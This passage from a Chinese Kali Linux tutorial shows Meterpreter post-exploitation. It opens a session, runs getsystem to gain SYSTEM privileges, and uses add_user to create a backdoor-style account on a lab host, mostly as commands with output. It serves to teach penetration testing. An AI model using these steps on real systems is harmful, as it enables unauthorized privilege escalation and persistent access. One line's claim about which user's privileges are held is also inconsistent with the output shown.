7.2 本地权限提升

上一节介绍了窃取目标系统令牌,现在来介绍窃取令牌后如何提升在目标系统上的权限。提升本地权限可以使用户访问目标系统,并且进行其他的操作,如创建用户和组等。本节将介绍本地权限提升。

同样的实现本地权限提升,也需要连接到Meterpreter会话,具体操作就不再介绍。本地权限提升的具体操作步骤如下所示。

(1)启动Meterpreter会话。执行命令如下所示:

  1. msf auxiliary(browser_autopwn) > sessions -i 1
  2. [*] Starting interaction with 1
  3. meterpreter >

从输出的信息可以看到,成功启动了Meterpreter会话。

(2)使用getsystem命令提升本地权限。首先,查看该命令的帮助信息。执行命令如下所示:

  1. meterpreter > getsystem -h
  2. Usage: getsystem [options]
  3. Attempt to elevate your privilege to that of local system.
  4. OPTIONS:
  5. -h Help Banner.
  6. -t <opt> The technique to use. (Default to '0').
  7. 0 : All techniques available
  8. 1 : Service - Named Pipe Impersonation (In Memory/Admin)
  9. 2 : Service - Named Pipe Impersonation (Dropper/Admin)
  10. 3 : Service - Token Duplication (In Memory/Admin)

输出的信息显示了getsystem命令的语法格式、作用及选项等。此时就可以根据自己的需要,使用相应的选项来提升本地权限。

(3)使用getsystem命令提升本地权限。执行命令如下所示:

  1. meterpreter > getsystem
  2. got system (via technique 1).
  3. meterpreter >

从输出的信息可以看到,自动选择了方法1。此时该用户就拥有了目标系统中Test用户的权限了,然后就可以做其他的操作,如创建文件、创建用户和组等。如使用该用户在目标系统上192.168.41.146创建一个名为bob的用户。执行命令如下所示:

  1. meterpreter > add_user bob 123456 -h 192.168.41.146

执行以上命令后,可以在主机192.168.41.146上查看到创建的bob用户。

原文: https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/37.html